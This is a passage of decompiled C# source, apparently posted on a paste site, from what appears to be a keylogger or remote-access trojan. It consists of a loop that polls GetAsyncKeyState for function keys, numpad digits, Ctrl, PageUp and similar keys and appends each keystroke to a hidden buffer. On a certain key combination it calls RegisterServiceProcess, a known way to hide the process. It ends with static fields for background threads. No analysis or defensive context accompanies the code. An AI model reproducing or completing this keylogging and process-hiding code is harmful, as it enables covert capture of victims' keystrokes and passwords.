  714.                 if (flag)
  715.                 {
  716.                     A.BRK += "/";
  717.                 }
  718.                 flag = ((A.GetAsyncKeyState(107L) & 1) == 1);
  719.                 if (flag)
  720.                 {
  721.                     A.BRK += "+";
  722.                 }
  723.                 flag = ((A.GetAsyncKeyState(109L) & 1) == 1);
  724.                 if (flag)
  725.                 {
  726.                     A.BRK += "-";
  727.                 }
  728.                 flag = ((A.GetAsyncKeyState(110L) & 1) == 1);
  729.                 if (flag)
  730.                 {
  731.                     A.BRK += ".";
  732.                 }
  733.                 flag = ((A.GetAsyncKeyState(112L) & 1) == 1);
  734.                 if (flag)
  735.                 {
  736.                     A.BRK += "[F1]";
  737.                 }
  738.                 flag = ((A.GetAsyncKeyState(113L) & 1) == 1);
  739.                 if (flag)
  740.                 {
  741.                     A.BRK += "[F2]";
  742.                 }
  743.                 flag = ((A.GetAsyncKeyState(114L) & 1) == 1);
  744.                 if (flag)
  745.                 {
  746.                     A.BRK += "[F3]";
  747.                 }
  748.                 flag = ((A.GetAsyncKeyState(115L) & 1) == 1);
  749.                 if (flag)
  750.                 {
  751.                     A.BRK += "[F4]";
  752.                 }
  753.                 flag = ((A.GetAsyncKeyState(116L) & 1) == 1);
  754.                 if (flag)
  755.                 {
  756.                     A.BRK += "[F5]";
  757.                 }
  758.                 flag = ((A.GetAsyncKeyState(117L) & 1) == 1);
  759.                 if (flag)
  760.                 {
  761.                     A.BRK += "[F6]";
  762.                 }
  763.                 flag = ((A.GetAsyncKeyState(118L) & 1) == 1);
  764.                 if (flag)
  765.                 {
  766.                     A.BRK += "[F7]";
  767.                 }
  768.                 flag = ((A.GetAsyncKeyState(119L) & 1) == 1);
  769.                 if (flag)
  770.                 {
  771.                     A.BRK += "[F8]";
  772.                 }
  773.                 flag = ((A.GetAsyncKeyState(120L) & 1) == 1);
  774.                 if (flag)
  775.                 {
  776.                     A.BRK += "[F9]";
  777.                 }
  778.                 flag = ((A.GetAsyncKeyState(121L) & 1) == 1);
  779.                 if (flag)
  780.                 {
  781.                     A.BRK += "[F10]";
  782.                 }
  783.                 flag = ((A.GetAsyncKeyState(122L) & 1) == 1);
  784.                 if (flag)
  785.                 {
  786.                     A.BRK += "[F11]";
  787.                 }
  788.                 asyncKeyState2 = A.GetAsyncKeyState(123L);
  789.                 flag = (asyncKeyState == 0 & (asyncKeyState2 & 1) == 1);
  790.                 if (flag)
  791.                 {
  792.                     A.BRK += "[F12]";
  793.                 }
  794.                 flag = (asyncKeyState != 0 & (asyncKeyState2 & 1) == 1);
  795.                 if (flag)
  796.                 {
  797.                     A.RegisterServiceProcess(0, 0);
  798.                 }
  799.                 flag = ((A.GetAsyncKeyState(144L) & 1) == 1);
  800.                 if (flag)
  801.                 {
  802.                     A.BRK += "[NumLock]";
  803.                 }
  804.                 flag = ((A.GetAsyncKeyState(145L) & 1) == 1);
  805.                 if (flag)
  806.                 {
  807.                     A.BRK += "[ScrollLock]";
  808.                 }
  809.                 flag = ((A.GetAsyncKeyState(42L) & 1) == 1);
  810.                 if (flag)
  811.                 {
  812.                     A.BRK += "[PrintScreen]";
  813.                 }
  814.                 flag = ((A.GetAsyncKeyState(33L) & 1) == 1);
  815.                 if (flag)
  816.                 {
  817.                     A.BRK += "[PageUp]";
  818.                 }
  819.                 flag = ((A.GetAsyncKeyState(34L) & 1) == 1);
  820.                 if (flag)
  821.                 {
  822.                     A.BRK += "[Pagedown]";
  823.                 }
  824.                 flag = ((A.GetAsyncKeyState(97L) & 1) == 1);
  825.                 if (flag)
  826.                 {
  827.                     A.BRK += "1";
  828.                 }
  829.                 flag = ((A.GetAsyncKeyState(98L) & 1) == 1);
  830.                 if (flag)
  831.                 {
  832.                     A.BRK += "2";
  833.                 }
  834.                 flag = ((A.GetAsyncKeyState(99L) & 1) == 1);
  835.                 if (flag)
  836.                 {
  837.                     A.BRK += "3";
  838.                 }
  839.                 flag = ((A.GetAsyncKeyState(100L) & 1) == 1);
  840.                 if (flag)
  841.                 {
  842.                     A.BRK += "4";
  843.                 }
  844.                 flag = ((A.GetAsyncKeyState(101L) & 1) == 1);
  845.                 if (flag)
  846.                 {
  847.                     A.BRK += "5";
  848.                 }
  849.                 flag = ((A.GetAsyncKeyState(102L) & 1) == 1);
  850.                 if (flag)
  851.                 {
  852.                     A.BRK += "6";
  853.                 }
  854.                 flag = ((A.GetAsyncKeyState(103L) & 1) == 1);
  855.                 if (flag)
  856.                 {
  857.                     A.BRK += "7";
  858.                 }
  859.                 flag = ((A.GetAsyncKeyState(104L) & 1) == 1);
  860.                 if (flag)
  861.                 {
  862.                     A.BRK += "8";
  863.                 }
  864.                 flag = ((A.GetAsyncKeyState(105L) & 1) == 1);
  865.                 if (flag)
  866.                 {
  867.                     A.BRK += "9";
  868.                 }
  869.                 flag = ((A.GetAsyncKeyState(96L) & 1) == 1);
  870.                 if (flag)
  871.                 {
  872.                     A.BRK += "0";
  873.                 }
  874.                 flag = ((A.GetAsyncKeyState(17L) & 1) == 1);
  875.                 if (flag)
  876.                 {
  877.                     A.BRK += "[Ctrl]";
  878.                 }
  879.             }
  880.         }
  881.  
  882.         // Token: 0x04000088 RID: 136
  883.         private static string actv = A.ACTvv();
  884.  
  885.         // Token: 0x04000089 RID: 137
  886.         private static string BRK = "";
  887.  
  888.         // Token: 0x0400008A RID: 138
  889.         private static bool runx = false;
  890.  
  891.         // Token: 0x0400008B RID: 139
  892.         private static bool runy = false;
  893.  
  894.         // Token: 0x0400008C RID: 140
  895.         private static Thread thx;
  896.  
  897.         // Token: 0x0400008D RID: 141
  898.         private static Thread thy;
  899.     }
  900. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement